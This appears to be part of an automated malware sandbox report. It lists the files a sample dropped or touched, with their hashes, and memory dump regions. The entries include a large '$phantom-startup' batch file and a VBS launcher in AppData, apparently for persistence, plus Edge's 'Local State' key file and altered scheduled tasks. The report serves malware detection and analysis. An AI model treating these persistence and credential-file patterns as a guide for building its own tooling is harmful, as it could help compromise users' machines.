                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                          Filesize

                                                                                                                                                                          12KB

                                                                                                                                                                          MD5

                                                                                                                                                                          784db976263eb62b9db8dc5a45de1c51

                                                                                                                                                                          SHA1

                                                                                                                                                                          96cfe19ea00d5b038ac82f4439aab14fabbbaf5b

                                                                                                                                                                          SHA256

                                                                                                                                                                          aeae0a07af6739c6a9a4aaee357fd78819f61cc8d1d5b32197f283e1bdcbba40

                                                                                                                                                                          SHA512

                                                                                                                                                                          9d3342173961bac06ee152e406cf352d70ed3028f00ef24a022e6599205af34d05d4f26dd1fa07f9e6b32a5022f1a76d4bb4f75d7b719737371785163a0bef06

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                                                                                          SHA1

                                                                                                                                                                          0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                                                                                          SHA256

                                                                                                                                                                          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                                                                                          SHA512

                                                                                                                                                                          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                          Filesize

                                                                                                                                                                          328B

                                                                                                                                                                          MD5

                                                                                                                                                                          ace71b4733b8e648a9d45f1fc0d9e66d

                                                                                                                                                                          SHA1

                                                                                                                                                                          a7e012abe4ea336c41b42e46f31240399a12c8f0

                                                                                                                                                                          SHA256

                                                                                                                                                                          592b152c10a24241a062ff1322146d73f4f950ae034c73664b00d72d9fc8e575

                                                                                                                                                                          SHA512

                                                                                                                                                                          1821b2504ea557600b47a9cf8c2fe5afdd876f568d7fed5b9181fff1f846ebce97b4fdc33c47dcdb0c53586a3b4a369d7fc6acef63bac15a721236434eb96344

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                                          Filesize

                                                                                                                                                                          330B

                                                                                                                                                                          MD5

                                                                                                                                                                          84cd43b5575b3ddc3f2347080dc6cbbc

                                                                                                                                                                          SHA1

                                                                                                                                                                          da3344f0a54da76645882611f2358ec8fd81dd3b

                                                                                                                                                                          SHA256

                                                                                                                                                                          a1dc6cf72eaf295866d19e8a52639adea0077a4771f53852f9fa97a97dfa6e30

                                                                                                                                                                          SHA512

                                                                                                                                                                          c73da176818c85372cdfa91440e450ce7653a30e5147dd547c06b63408a72b5b1f21952e1a815e891398771f5af44ba49ad1be945172b970328beeb4185ced7d

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5fhxwld.od4.ps1
                                                                                                                                                                          Filesize

                                                                                                                                                                          60B

                                                                                                                                                                          MD5

                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                          SHA1

                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                          SHA256

                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                          SHA512

                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp77D0.tmp.bat
                                                                                                                                                                          Filesize

                                                                                                                                                                          57B

                                                                                                                                                                          MD5

                                                                                                                                                                          e3afb0a1bbf922dbcd83ffac97fba172

                                                                                                                                                                          SHA1

                                                                                                                                                                          5e5845b20a5caed7da5528d3723b36a02bcc3c67

                                                                                                                                                                          SHA256

                                                                                                                                                                          8d725818817ce5b89da26b709a1f798e7d62a56c727bd7095da5876756bb7bd3

                                                                                                                                                                          SHA512

                                                                                                                                                                          ca37fd23909f856850a6af203e675f1916916834e38120642f1cf23fcbbc3c1cbc38c390c4d9bbfdf2d0ef9d6ecd7c5394fc476d658d70b908a685182d1eee35

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat
                                                                                                                                                                          Filesize

                                                                                                                                                                          2.3MB

                                                                                                                                                                          MD5

                                                                                                                                                                          e49ed1028bf0c289d62cdca6b440d752

                                                                                                                                                                          SHA1

                                                                                                                                                                          e3f18d496cdb64b2e3388bfd579cfd59adc70752

                                                                                                                                                                          SHA256

                                                                                                                                                                          4d930eaabcd25150ee60e0f5f9147aedc06837c09a254186eaad4d78a118a782

                                                                                                                                                                          SHA512

                                                                                                                                                                          15f8d558479b7c03cecc7aa3ec734a762941d7b20a246cfad1e6f24aa8b6eadf351a48ca953dc5123429d52f7f0a20d21104f4ae52bdcbc584f26587be1e9604

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs
                                                                                                                                                                          Filesize

                                                                                                                                                                          124B

                                                                                                                                                                          MD5

                                                                                                                                                                          9bdfca7cb8d2c80c7087052e340af01d

                                                                                                                                                                          SHA1

                                                                                                                                                                          684c2f5cbda6f99e646ac94855385cfece10e859

                                                                                                                                                                          SHA256

                                                                                                                                                                          91d7486ba28365901c8069d0d66541cdaabc33e767d823b93ee2888430671fa1

                                                                                                                                                                          SHA512

                                                                                                                                                                          05333b285613b30b83e31f77e8f9cec2151c8c31c12904da3f9dc4c08d4f9abfdd41dda51fd2cbb713dede68d3b99124f3142f2d0496f75b76c4e4e5259d9701

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                          SHA1

                                                                                                                                                                          98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                          SHA256

                                                                                                                                                                          ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                          SHA512

                                                                                                                                                                          c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          f313c5b4f95605026428425586317353

                                                                                                                                                                          SHA1

                                                                                                                                                                          06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                          SHA256

                                                                                                                                                                          129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                          SHA512

                                                                                                                                                                          b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                          SHA1

                                                                                                                                                                          a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                          SHA256

                                                                                                                                                                          98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                          SHA512

                                                                                                                                                                          1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                          SHA1

                                                                                                                                                                          63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                          SHA256

                                                                                                                                                                          727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                          SHA512

                                                                                                                                                                          f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                          SHA1

                                                                                                                                                                          9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                          SHA256

                                                                                                                                                                          a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                          SHA512

                                                                                                                                                                          c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • \??\pipe\LOCAL\crashpad_1140_KLGYTLZBIVAKYSJW
                                                                                                                                                                          MD5

                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                          SHA1

                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                          SHA256

                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                          SHA512

                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • memory/224-27-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/224-28-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/224-29-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/224-32-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/924-110-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/956-114-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1116-103-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1176-107-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-15-0x00000201423A0000-0x00000201423A8000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          32KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-11-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-12-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-50-0x00007FF9D5850000-0x00007FF9D6311000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-14-0x00000201448B0000-0x0000020144926000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          472KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-1-0x0000020142330000-0x0000020142352000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          136KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-13-0x0000020144480000-0x00000201444C4000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          272KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-0-0x00007FF9D5853000-0x00007FF9D5855000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1312-16-0x0000020144930000-0x0000020144AE8000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          1.7MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1340-101-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1392-105-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1456-104-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1564-113-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1696-102-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1732-108-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1948-109-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/1992-112-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/3048-111-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/3340-51-0x0000000003780000-0x00000000037AA000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          168KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/3340-85-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/3908-147-0x000001EF00610000-0x000001EF007A2000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          1.6MB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/4852-106-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download
                                                                                                                                                                        • memory/4904-100-0x00007FF9B4790000-0x00007FF9B47A0000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          Download